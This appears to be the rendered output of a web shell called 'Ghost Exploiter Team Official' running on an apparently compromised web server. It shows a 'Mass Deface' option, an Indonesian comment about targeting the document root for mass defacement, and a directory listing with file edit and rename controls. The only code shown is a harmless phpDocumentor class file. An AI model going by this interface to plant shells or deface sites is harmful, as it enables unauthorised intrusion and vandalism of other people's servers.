Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
phpdocumentor
/
reflection
/
tests
/
integration
/
Metadata
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
Hook.php
0.376KB
edt
ren
HookStrategy.php
0.857KB
edt
ren
example.php
0.139KB
edt
ren
<?php declare(strict_types=1); namespace phpDocumentor\Reflection\Metadata; final class Hook implements Metadata { private $hook; public function __construct(string $hook) { $this->hook = $hook; } public function key(): string { return "project-metadata"; } public function hook(): string { return $this->hook; } }
<=Back
Liking